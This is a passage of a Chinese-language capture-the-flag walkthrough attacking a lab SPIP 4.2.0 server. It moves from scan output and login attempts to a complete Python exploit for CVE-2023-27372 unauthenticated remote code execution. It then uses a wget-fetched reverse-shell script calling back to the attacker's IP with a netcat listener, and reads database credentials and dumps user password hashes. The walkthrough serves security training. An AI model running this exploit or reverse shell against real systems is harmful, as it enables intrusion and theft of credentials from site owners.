http:\/\/172.20.10.4\/squelettes-dist\/ical.html\n200 GET 24l 38w 739c http:\/\/172.20.10.4\/squelettes-dist\/calendrier.html\n200 GET 124l 248w 3867c http:\/\/172.20.10.4\/squelettes-dist\/recherche.html\n200 GET 78l 179w 3100c http:\/\/172.20.10.4\/squelettes-dist\/backend-breves.html\n200 GET 86l 205w 3378c http:\/\/172.20.10.4\/squelettes-dist\/article.html\n200 GET 16l 22w 322c http:\/\/172.20.10.4\/squelettes-dist\/paquet.xml\n200 GET 53l 118w 2233c http:\/\/172.20.10.4\/squelettes-dist\/forum.html\n200 GET 55l 139w 2334c http:\/\/172.20.10.4\/squelettes-dist\/inc-rss-item.html\n200 GET 26l 45w 1385c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_breve.html\n200 GET 10993l 45090w 293671c http:\/\/172.20.10.4\/prive\/javascript\/jquery.js\n200 GET 147l 465w 4150c http:\/\/172.20.10.4\/prive\/javascript\/js.cookie.js\n200 GET 126l 461w 7514c http:\/\/172.20.10.4\/\n200 GET 237l 1744w 13848c http:\/\/172.20.10.4\/prive\/xhtml-symbol.ent\n200 GET 66l 488w 3660c http:\/\/172.20.10.4\/prive\/spip_style.css\n200 GET 15l 46w 439c http:\/\/172.20.10.4\/prive\/spip_style_print.css\n200 GET 14l 49w 556c http:\/\/172.20.10.4\/prive\/style_prive.css.html\n200 GET 43l 100w 1615c http:\/\/172.20.10.4\/prive\/login.html\n200 GET 80l 527w 4131c http:\/\/172.20.10.4\/prive\/xhtml-special.ent\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/prive\/ajax_selecteur_fonctions.php\n200 GET 8l 12w 220c http:\/\/172.20.10.4\/prive\/ajax_item_pick.html\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/prive\/ajax_item_pick_fonctions.php\n200 GET 371l 1466w 13268c http:\/\/172.20.10.4\/prive\/spip_admin.css\n200 GET 8l 12w 199c http:\/\/172.20.10.4\/prive\/ajax_selecteur.html\n200 GET 122l 211w 5910c http:\/\/172.20.10.4\/prive\/ical_prive.html\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/config\/chmod.php\n200 GET 1l 2w 14c http:\/\/172.20.10.4\/config\/cles.php\n200 GET 1l 1w 10c http:\/\/172.20.10.4\/tmp\/job_queue_next.txt\n200 GET 3l 13w 83c http:\/\/172.20.10.4\/tmp\/remove.txt\n200 GET 36l 67w 1504c http:\/\/172.20.10.4\/squelettes-dist\/backend.html\n200 GET 2l 3w 97c http:\/\/172.20.10.4\/squelettes-dist\/favicon.ico.html\n200 GET 21l 121w 807c http:\/\/172.20.10.4\/squelettes-dist\/CHANGELOG.md\n200 GET 76l 133w 2297c http:\/\/172.20.10.4\/squelettes-dist\/sommaire.html\n200 GET 26l 45w 1397c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_rubrique.html\n200 GET 120l 321w 3558c http:\/\/172.20.10.4\/squelettes-dist\/backend.xslt.html\n200 GET 34l 80w 1345c http:\/\/172.20.10.4\/squelettes-dist\/identifiants.html\n200 GET 98l 222w 3475c http:\/\/172.20.10.4\/squelettes-dist\/site.html\n200 GET 1l 3w 130c http:\/\/172.20.10.4\/squelettes-dist\/puce_rtl.gif\n200 GET 41l 65w 1235c http:\/\/172.20.10.4\/squelettes-dist\/contact.html\n200 GET 26l 45w 1422c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_article.html\n200 GET 145l 320w 4758c http:\/\/172.20.10.4\/squelettes-dist\/mot.html\n200 GET 48l 89w 1894c http:\/\/172.20.10.4\/squelettes-dist\/404.html\n200 GET 26l 46w 1414c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_thread.html\n200 GET 85l 202w 3092c http:\/\/172.20.10.4\/squelettes-dist\/breve.html\n200 GET 161l 349w 5459c http:\/\/172.20.10.4\/squelettes-dist\/rubrique.html\n200 GET 61l 166w 1975c http:\/\/172.20.10.4\/squelettes-dist\/sitemap.xml.html\n200 GET 82l 160w 2616c http:\/\/172.20.10.4\/squelettes-dist\/auteur.html\n200 GET 40l 64w 1171c http:\/\/172.20.10.4\/squelettes-dist\/plan.html\n200 GET 37l 44w 868c http:\/\/172.20.10.4\/squelettes-dist\/nouveautes.html\n200 GET 1l 27w 9052c http:\/\/172.20.10.4\/squelettes-dist\/spip.ico\n200 GET 24l 47w 536c http:\/\/172.20.10.4\/squelettes-dist\/robots.txt.html\n301 GET 9l 28w 311c http:\/\/172.20.10.4\/ecrire => http:\/\/172.20.10.4\/ecrire\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/xml => http:\/\/172.20.10.4\/ecrire\/xml\/\n301 GET 9l 28w 319c http:\/\/172.20.10.4\/ecrire\/plugins => http:\/\/172.20.10.4\/ecrire\/plugins\/\n301 GET 9l 28w 318c http:\/\/172.20.10.4\/ecrire\/public => http:\/\/172.20.10.4\/ecrire\/public\/\n301 GET 9l 28w 318c http:\/\/172.20.10.4\/ecrire\/action => http:\/\/172.20.10.4\/ecrire\/action\/\n301 GET 9l 28w 319c http:\/\/172.20.10.4\/ecrire\/install => http:\/\/172.20.10.4\/ecrire\/install\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/src => http:\/\/172.20.10.4\/ecrire\/src\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/lang => http:\/\/172.20.10.4\/ecrire\/lang\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/exec => http:\/\/172.20.10.4\/ecrire\/exec\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/base => http:\/\/172.20.10.4\/ecrire\/base\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/inc => http:\/\/172.20.10.4\/ecrire\/inc\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/auth => http:\/\/172.20.10.4\/ecrire\/auth\/\n301 GET 9l 28w 325c http:\/\/172.20.10.4\/ecrire\/notifications => http:\/\/172.20.10.4\/ecrire\/notifications\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/urls => http:\/\/172.20.10.4\/ecrire\/urls\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/req => http:\/\/172.20.10.4\/ecrire\/req\/\n301 GET 9l 28w 310c http:\/\/172.20.10.4\/prive => http:\/\/172.20.10.4\/prive\/\n301 GET 9l 28w 317c http:\/\/172.20.10.4\/ecrire\/genie => http:\/\/172.20.10.4\/ecrire\/genie\/\n301 GET 9l 28w 322c http:\/\/172.20.10.4\/javascript\/jquery => http:\/\/172.20.10.4\/javascript\/jquery\/\n[###################>] - 4m 645730\/661832 0s found:121 errors:0 \n[####################] - 4m 661832\/661832 0s found:121 errors:0 \n[####################] - 4m 220546\/220546 893\/s http:\/\/172.20.10.4\/ \n[####################] - 4s 220546\/220546 54002\/s http:\/\/172.20.10.4\/plugins-dist\/ => Directory listing\n[####################] - 5s 220546\/220546 47872\/s http:\/\/172.20.10.4\/prive\/ => Directory listing\n[####################] - 4s 220546\/220546 56133\/s http:\/\/172.20.10.4\/local\/ => Directory listing\n[####################] - 4m 220546\/220546 870\/s http:\/\/172.20.10.4\/javascript\/ \n[####################] - 5s 220546\/220546 48123\/s http:\/\/172.20.10.4\/vendor\/ => Directory listing\n[####################] - 5s 220546\/220546 47614\/s http:\/\/172.20.10.4\/config\/ => Directory listing\n[####################] - 5s 220546\/220546 44367\/s http:\/\/172.20.10.4\/tmp\/ => Directory listing\n[####################] - 0s 220546\/220546 27568250\/s http:\/\/172.20.10.4\/IMG\/ => Directory listing\n[####################] - 4s 220546\/220546 56305\/s http:\/\/172.20.10.4\/squelettes-dist\/ => Directory listing\n[####################] - 4m 220546\/220546 894\/s http:\/\/172.20.10.4\/ecrire\/<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-10 00:05:09 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: Uncommon header 'composed-by' found, with contents: SPIP 4.2.0 @ www.spip.net + http:\/\/172.20.10.4\/local\/config.txt.\n+ \/: Uncommon header 'x-spip-cache' found, with contents: 86400.\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/config\/: Directory indexing found.\n+ \/config\/: Configuration information may be available remotely.\n+ \/tmp\/: Directory indexing found.\n+ \/tmp\/: This might be interesting.\n+ \/htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.\n+ \/composer.json: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/composer.lock: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/README.md: Readme Found.\n+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host\n+ End Time: 2024-04-10 00:05:34 (GMT-4) (25 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u914d\u7f6e\u67e5\u770b<\/h3>\nwhatweb 172.20.10.4<\/code><\/pre>\nhttp:\/\/172.20.10.4 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[172.20.10.4], JQuery, MetaGenerator[SPIP 4.2.0], SPIP[4.2.0][http:\/\/172.20.10.4\/local\/config.txt], Script[text\/javascript], Title[Mi sitio SPIP], UncommonHeaders[composed-by,x-spip-cache]<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div><\/p>\nhttp:\/\/172.20.10.4\/config\/remove.txt\nVous pouvez effacer ce fichier sans dommages.\nYou can safely remove this file.<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.4\/tmp\/job_queue_next.txt\n1712729014<\/code><\/pre>\nhttp:\/\/172.20.10.4\/tmp\/log\/mysql.log\n......\n2023-10-03 15:42:58 192.168.0.101 (pid 4802) :Pri:HS: Echec mysqli_connect. Erreur : Access denied for user 'spipuser'@'localhost' (using password: YES)\n2023-10-03 15:43:53 192.168.0.101 (pid 4742) :Pri:HS: Echec mysqli_connect. Erreur : Access denied for user 'admin'@'localhost' (using password: NO)\n......<\/code><\/pre>\n\u5176\u5b9e\u4e1c\u897f\u6709\u5f88\u591a\uff0c\u4f46\u662f\u53d1\u73b0\u89c9\u5f97\u6709\u7528\u7684\u6bd4\u8f83\u5c11\uff0c\u6162\u6162\u770b\uff1a<\/p>\n
http:\/\/172.20.10.4\/tmp\/cache\/spip_versions_list.json\n{\n "api": 2,\n "versions": {\n "dev": "spip\/dev\/spip-master.zip",\n "4.2.11": "spip\/archives\/spip-v4.2.11.zip",\n "4.1.15": "spip\/archives\/spip-v4.1.15.zip",\n "4.0.11": "spip\/archives\/spip-v4.0.11.zip",\n "3.2.19": "spip\/archives\/spip-v3.2.19.zip"\n },\n "default_branch": "4.2",\n "requirements": {\n "php": {\n "master": "8.1.0",\n "4.2": "7.4.0",\n "4.1": "7.4.0",\n "4.0": "7.3.0",\n "3.2": "5.4.0"\n }\n }\n}<\/code><\/pre>\nhttp:\/\/172.20.10.4\/tmp\/CACHEDIR.TAG\nSignature: 8a477f597d28d172789f06886806bc55\n# This file is a cache directory tag created by SPIP.\n# For information about cache directory tags, see:\n# http:\/\/www.brynosaurus.com\/cachedir\/<\/code><\/pre>\n\u751a\u81f3\u8fd8\u6709\u538b\u7f29\u5305\uff0c\u4f46\u662f\u91cc\u9762\u6ca1\u6709\u4ec0\u4e48\u6709\u4ef7\u503c\u7684\u4fe1\u606f\uff0c\u57fa\u672c\u662f\u914d\u7f6e\u4fe1\u606f\u3002<\/p>\n
\u8fd8\u627e\u5230\u4e86\u767b\u5f55\u9875\u9762\uff1a<\/p>\n
http:\/\/172.20.10.4\/spip.php<\/code><\/pre>\n<\/div><\/p>\n\u5176\u4ed6\u7684\u6211\u4f3c\u4e4e\u6ca1\u6709\u53d1\u73b0\u6bd4\u8f83\u6709\u4ef7\u503c\u7684\uff0c\u5148\u5c1d\u8bd5\u8fdb\u884c\u7b80\u5355\u7684\u5f31\u5bc6\u7801\u548c\u4e07\u80fd\u5bc6\u7801\uff0c\u7136\u540e\u5c1d\u8bd5\u8fdb\u884csql\u6ce8\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5sql\u6ce8\u5165\uff1a<\/p>\n
POST \/spip.php?page=login&url=%2Fecrire%2F&lang=fr HTTP\/1.1\nHost: 172.20.10.4\nContent-Length: 265\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/172.20.10.4\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/172.20.10.4\/spip.php?page=login&url=%2Fecrire%2F&lang=fr\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\npage=login&url=%2Fecrire%2F&lang=fr&formulaire_action=login&formulaire_action_args=gYHWt7rAiJ9zrPAiAI6XQl5eYzZa62dsPenl8w0EiILo%2BAbt%2B4GWnfiRsFbKvBojvnPYjDzo%2FzQ0ghyTk3tUUn0xV1PZs03PSYbSQKSgN5MjbMjTVA%3D%3D&formulaire_action_sign=&var_login=admin&password=123456<\/code><\/pre>\n<\/div><\/p>\n\u4f3c\u4e4e\u4e0d\u592a\u9614\u4ee5\uff0c\u5c1d\u8bd5\u5fd8\u8bb0\u5bc6\u7801\uff1a<\/p>\n
http:\/\/172.20.10.4\/spip.php?page=spip_pass<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5LFI\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u627e\u6f0f\u6d1e<\/h3>\n
\u6328\u4e2a\u67e5\u627e\u662f\u5426\u5b58\u5728\u5386\u53f2\u6f0f\u6d1e\uff1a<\/p>\n
<\/div><\/p>\n\u9776\u673a\u521b\u7acb\u65f6\u95f4\u57282023-10-18<\/code>\uff0c\u5bfb\u627e\u5728\u6b64\u4e4b\u524d\u7684\u6f0f\u6d1e\uff1a<\/p>\nCMS<\/h4>\n
<\/div><\/p>\n#!\/usr\/bin\/env python3\n# -*- coding: utf-8 -*-\n\n# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)\n# Google Dork: inurl:"\/spip.php?page=login"\n# Date: 19\/06\/2023 \u65f6\u95f4\u4e0a\u5728\u9776\u573a\u51fa\u6765\u63a5\u8fd1\u534a\u5e74\u524d\u4e86\uff0c\u5e94\u8be5\u662f\u8fd9\u4e2a\uff01\n# Exploit Author: nuts7 (https:\/\/github.com\/nuts7\/CVE-2023-27372)\n# Vendor Homepage: https:\/\/www.spip.net\/\n# Software Link: https:\/\/files.spip.net\/spip\/archives\/\n# Version: < 4.2.1 (Except few fixed versions indicated in the description)\n# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0\n# CVE reference : CVE-2023-27372 (coiffeur)\n# CVSS : 9.8 (Critical)\n#\n# Vulnerability Description:\n#\n# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.\n#\n# Usage: python3 CVE-2023-27372.py http:\/\/example.com\n\nimport argparse\nimport bs4\nimport html\nimport requests\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")\n parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")\n parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")\n parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")\n return parser.parse_args()\n\ndef get_anticsrf(url):\n r = requests.get('%s\/spip.php?page=spip_pass' % url, timeout=10)\n soup = bs4.BeautifulSoup(r.text, 'html.parser')\n csrf_input = soup.find('input', {'name': 'formulaire_action_args'})\n if csrf_input:\n csrf_value = csrf_input['value']\n if options.verbose:\n print("[+] Anti-CSRF token found : %s" % csrf_value)\n return csrf_value\n else:\n print("[-] Unable to find Anti-CSRF token")\n return -1\n\ndef send_payload(url, payload):\n data = {\n "page": "spip_pass",\n "formulaire_action": "oubli",\n "formulaire_action_args": csrf,\n "oubli": payload\n }\n r = requests.post('%s\/spip.php?page=spip_pass' % url, data=data)\n if options.verbose:\n print("[+] Execute this payload : %s" % payload)\n return 0\n\nif __name__ == '__main__':\n options = parseArgs()\n\n requests.packages.urllib3.disable_warnings()\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n try:\n requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n except AttributeError:\n pass\n\n csrf = get_anticsrf(url=options.url)\n send_payload(url=options.url, payload="s:%s:\\"<?php system('%s'); ?>\\";" % (20 + len(options.command), options.command))<\/code><\/pre>\n\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
# kali1\necho 'bash -c "exec bash -i &>\/dev\/tcp\/172.20.10.8\/1234 <&1"' > revershell.sh\npython3 -m http.server 2345\n# kali2\nnc -lvnp 1234\n# kali3\npython3 51536.py -u http:\/\/172.20.10.4 -c 'wget http:\/\/172.20.10.8:2345\/revershell.sh'\npython3 51536.py -u http:\/\/172.20.10.4 -c 'bash revershell.sh'<\/code><\/pre>\n<\/div><\/p>\n\uff08\u6211\u6bd4\u8f83\u4e71\uff0c\u968f\u4fbf\u641e\u7684\uff0c\u548c\u4e0a\u9762\u63cf\u8ff0\u7684\u4e0d\u4e00\u6837\uff09<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@pipy:\/var\/www\/html$ ls\nCHANGELOG.md LICENSE SECURITY.md composer.lock ecrire index.php plugins-dist prive spip.php spip.svg tmp\nIMG README.md composer.json config htaccess.txt local plugins-dist.json revershell.sh spip.png squelettes-dist vendor\n(remote) www-data@pipy:\/var\/www\/html$ cat config\ncat: config: Is a directory\n(remote) www-data@pipy:\/var\/www\/html$ ls -F \nCHANGELOG.md LICENSE SECURITY.md composer.lock ecrire\/ index.php plugins-dist\/ prive\/ spip.php spip.svg tmp\/\nIMG\/ README.md composer.json config\/ htaccess.txt local\/ plugins-dist.json revershell.sh spip.png squelettes-dist\/ vendor\/\n(remote) www-data@pipy:\/var\/www\/html$ cd config\n(remote) www-data@pipy:\/var\/www\/html\/config$ ls\nchmod.php cles.php connect.php ecran_securite.php remove.txt\n(remote) www-data@pipy:\/var\/www\/html\/config$ cd ..\/ \n(remote) www-data@pipy:\/var\/www\/html$ cat SECURITY.md \n# Security Policy\n\n## Signaler une faille de s\u00e9curit\u00e9\n\nVoir https:\/\/www.spip.net\/fr_article6688.html\n\n## Reporting a Vulnerability\n\nSee https:\/\/www.spip.net\/en_article6689.html(remote) www-data@pipy:\/var\/www\/html$ cd ..\/\n(remote) www-data@pipy:\/var\/www$ ls -la\ntotal 20\ndrwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 .\ndrwxr-xr-x 14 root root 4096 Oct 2 2023 ..\n-rw------- 1 www-data www-data 130 Oct 5 2023 .bash_history\ndrwxrwxrwx 3 www-data www-data 4096 Oct 5 2023 .local\ndrwxr-xr-x 11 www-data www-data 4096 Apr 10 04:46 html\n(remote) www-data@pipy:\/var\/www$ history .bash_history \nbash: history: .bash_history: numeric argument required\n(remote) www-data@pipy:\/var\/www$ cat .bash_history \nwhoami\nexit\nexit\nreset xterm\nexport TERM=xterm-256color\nstty rows 51 cols 197\nls\nnano\nls\ncat config\/connect.php\nmysql -u root -p \n(remote) www-data@pipy:\/var\/www$ cd html\n(remote) www-data@pipy:\/var\/www\/html$ ls -la\ntotal 160\ndrwxr-xr-x 11 www-data www-data 4096 Apr 10 04:46 .\ndrwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 ..\n-rw-r--r-- 1 www-data www-data 7045 Feb 23 2023 CHANGELOG.md\ndrwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 IMG\n-rw-r--r-- 1 www-data www-data 35147 Feb 23 2023 LICENSE\n-rw-r--r-- 1 www-data www-data 842 Feb 23 2023 README.md\n-rw-r--r-- 1 www-data www-data 178 Feb 23 2023 SECURITY.md\n-rw-r--r-- 1 www-data www-data 1761 Feb 23 2023 composer.json\n-rw-r--r-- 1 www-data www-data 27346 Feb 23 2023 composer.lock\ndrwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 config\ndrwxr-xr-x 22 www-data www-data 4096 Oct 3 2023 ecrire\n-rw-r--r-- 1 www-data www-data 4307 Feb 23 2023 htaccess.txt\n-rw-r--r-- 1 www-data www-data 42 Feb 23 2023 index.php\ndrwxr-xr-x 5 www-data www-data 4096 Oct 3 2023 local\ndrwxr-xr-x 22 www-data www-data 4096 Oct 3 2023 plugins-dist\n-rw-r--r-- 1 www-data www-data 3645 Feb 23 2023 plugins-dist.json\ndrwxr-xr-x 12 www-data www-data 4096 Oct 3 2023 prive\n-rw-rw-rw- 1 www-data www-data 55 Apr 10 04:43 revershell.sh\n-rw-r--r-- 1 www-data www-data 973 Feb 23 2023 spip.php\n-rw-r--r-- 1 www-data www-data 1212 Feb 23 2023 spip.png\n-rw-r--r-- 1 www-data www-data 1673 Feb 23 2023 spip.svg\ndrwxr-xr-x 10 www-data www-data 4096 Oct 3 2023 squelettes-dist\ndrwxr-xr-x 5 www-data www-data 4096 Apr 10 04:04 tmp\ndrwxr-xr-x 6 www-data www-data 4096 Oct 3 2023 vendor\n(remote) www-data@pipy:\/var\/www\/html$ cd config\/\n(remote) www-data@pipy:\/var\/www\/html\/config$ ls -la\ntotal 48\ndrwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 .\ndrwxr-xr-x 11 www-data www-data 4096 Apr 10 04:46 ..\n-rw-rw-rw- 1 www-data www-data 197 Oct 3 2023 .htaccess\n-rw-rw-rw- 1 www-data www-data 0 Oct 3 2023 .ok\n-rw-rw-rw- 1 www-data www-data 109 Oct 3 2023 chmod.php\n-rw-rw-rw- 1 www-data www-data 163 Oct 3 2023 cles.php\n-rw-rw-rw- 1 www-data www-data 243 Oct 3 2023 connect.php\n-rw-r--r-- 1 www-data www-data 17240 Feb 23 2023 ecran_securite.php\n-rw-r--r-- 1 www-data www-data 83 Feb 23 2023 remove.txt\n(remote) www-data@pipy:\/var\/www\/html\/config$ cat connect.php \n<?php\nif (!defined("_ECRIRE_INC_VERSION")) return;\ndefined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);\n$GLOBALS['spip_connect_version'] = 0.8;\nspip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');<\/code><\/pre>\n\u770b\u5230\u5386\u53f2\u8bb0\u5f55\u7a81\u7136\u4e00\u4e2a\u6fc0\u7075\uff0c\u6740\u4e86\u4e2a\u56de\u9a6c\u67aa\uff0chhh\uff0c\u5dee\u70b9\u9519\u8fc7\u3002<\/p>\n
root\ndbpassword<\/code><\/pre>\n\u67e5\u8be2\u6570\u636e\u5e93<\/h3>\n
\u5c1d\u8bd5\u8fde\u63a5\u6570\u636e\u5e93\uff0c\u5982\u679c\u662f\u76f4\u63a5nc\u7684\u53ef\u80fd\u9700\u8981\u7a33\u5b9a\u4e00\u4e0b\u6570\u636e\u5e93\uff0c\u89c1\u6700\u4e0b\u65b9\uff1a<\/p>\n
(remote) www-data@pipy:\/var\/www\/html\/config$ mysql -u root -p\nEnter password: \nWelcome to the MariaDB monitor. Commands end with ; or \\g.\nYour MariaDB connection id is 1548\nServer version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMariaDB [(none)]> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| mysql |\n| performance_schema |\n| spip |\n| sys |\n+--------------------+\n5 rows in set (0.027 sec)\n\nMariaDB [(none)]> use spip;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [spip]> show tables;\n+-------------------------+\n| Tables_in_spip |\n+-------------------------+\n| spip_articles |\n| spip_auteurs |\n| spip_auteurs_liens |\n| spip_depots |\n| spip_depots_plugins |\n| spip_documents |\n| spip_documents_liens |\n| spip_forum |\n| spip_groupes_mots |\n| spip_jobs |\n| spip_jobs_liens |\n| spip_meta |\n| spip_mots |\n| spip_mots_liens |\n| spip_paquets |\n| spip_plugins |\n| spip_referers |\n| spip_referers_articles |\n| spip_resultats |\n| spip_rubriques |\n| spip_syndic |\n| spip_syndic_articles |\n| spip_types_documents |\n| spip_urls |\n| spip_versions |\n| spip_versions_fragments |\n| spip_visites |\n| spip_visites_articles |\n+-------------------------+\n28 rows in set (0.001 sec)\n\nMariaDB [spip]> select * from spip_auteurs;\n+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| id_auteur | nom | bio | email | nom_site | url_site | login | pass tatut | webmestre | maj | pgp | htpass | en_ligne | alea_actuel prefs cles |\n+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| 1 | Angela | | angela@pipy.htb | | | angela | 4ng3l4 minirezo | oui | 2023-10-04 17:28:39 | | | 2023-10-04 13:50:34 | 387046876651c39a45bc836.13502903 a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:""; jg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOc0fCXOCxzCW9NwvzJYM\/u\/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8\/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= |\n| 2 | admin | | admin@pipy.htb | | | admin | $2y$10$UU8xkGHmmSzrF6elpQWjmeXooyfzHBcomite | non | 2024-04-10 04:37:08 | | | 2023-10-04 17:31:03 | 56364180666161774c5fff8.85980786 a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";FPNzl4\/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4\/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o= |\n+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n2 rows in set (0.000 sec)<\/code><\/pre>\n\u554a\u8fd9\uff0c\u4f30\u8ba1\u662f\u592a\u957f\u4e86\uff0c\u5c1d\u8bd5\u51cf\u5c11\u4e00\u4e0b\uff1a<\/p>\n
MariaDB [spip]> show columns from spip_auteurs;\n+--------------+--------------+------+-----+---------------------+-------------------------------+\n| Field | Type | Null | Key | Default | Extra |\n+--------------+--------------+------+-----+---------------------+-------------------------------+\n| id_auteur | bigint(21) | NO | PRI | NULL | auto_increment |\n| nom | text | NO | | '' | |\n| bio | text | NO | | '' | |\n| email | tinytext | NO | | '' | |\n| nom_site | tinytext | NO | | '' | |\n| url_site | text | NO | | '' | |\n| login | varchar(255) | YES | MUL | NULL | |\n| pass | tinytext | NO | | '' | |\n| low_sec | tinytext | NO | | '' | |\n| statut | varchar(255) | NO | MUL | 0 | |\n| webmestre | varchar(3) | NO | | non | |\n| maj | timestamp | NO | | current_timestamp() | on update current_timestamp() |\n| pgp | text | NO | | '' | |\n| htpass | tinytext | NO | | '' | |\n| en_ligne | datetime | NO | MUL | 0000-00-00 00:00:00 | |\n| alea_actuel | tinytext | YES | | NULL | 